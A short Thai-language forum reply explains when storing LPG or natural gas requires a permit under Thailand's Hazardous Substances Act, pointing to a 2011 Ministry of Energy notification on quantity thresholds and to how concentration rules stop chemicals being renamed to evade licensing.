ในกรณีของก๊าซ LPG และก๊าซธรรมชาติ นั้นเป็นวัตถุอันตรายในความรับผิดชอบของกรมธุรกิจพลังงาน ดังนั้น ตามความในข้อ 2 จึงต้องอ้างอิงเงื่อนไขของปริมาณของก๊าซ LPG ที่มีไว้ในครอบครอง ตามประกาศกระทรวงพลังงาน เรื่อง หลักเกณฑ์ และวิธีการในการเก็บรักษา การกำหนดบุคลากรที่รับผิดชอบ และการยกเว้นไม่ต้องปฏิบัติตามพระราชบัญญัติวัตถุอันตราย พ.ศ. ๒๕๓๕ สำหรับสถานที่ใช้ก๊าซปิโตรเลียมเหลว ที่กรมธุรกิจพลังงานรับผิดชอบ พ.ศ. ๒๕๕๔ เป็นหลัก (รายละเอียด ผมเขียนในบทความไว้แล้ว ให้ศึกษาประกอบ) ซึ่งถ้ามีปริมาณถึงตามเกณฑ์ที่กำหนดก็ให้ปฏิบัติตามประกาศฯดังกล่าวครับ ถ้ามีปริมาณไม่ถึงก็ไม่ต้องยื่นขออนุญาตครับ ส่วนความเข้มข้นนั้นทางกฎหมายเผื่อไว้ว่าสารเคมีบางตัวเป็นสารเดี่ยว หรือสารผสมซึ่งอาจจะมีชื่อเรียกต่างกัน แต่มีโครงสร้างทางเคมีเป็นสารชนิดเดียวกัน ก็ต้องเป็นไปตามข้อ 2 ครับ มิฉะนั้นผู้ประกอบการบางแห่งอาจจะหลีกเลี่ยงการขออนุญาตโดยอ้างว่าเป็นชื่อคนละตัวกันครับ
 
ผู้ตั้ง : ปิยะชัย จันทรวงศ์ไพศาล วันที่ : 08 ต.ค. 56 12:54:29 น.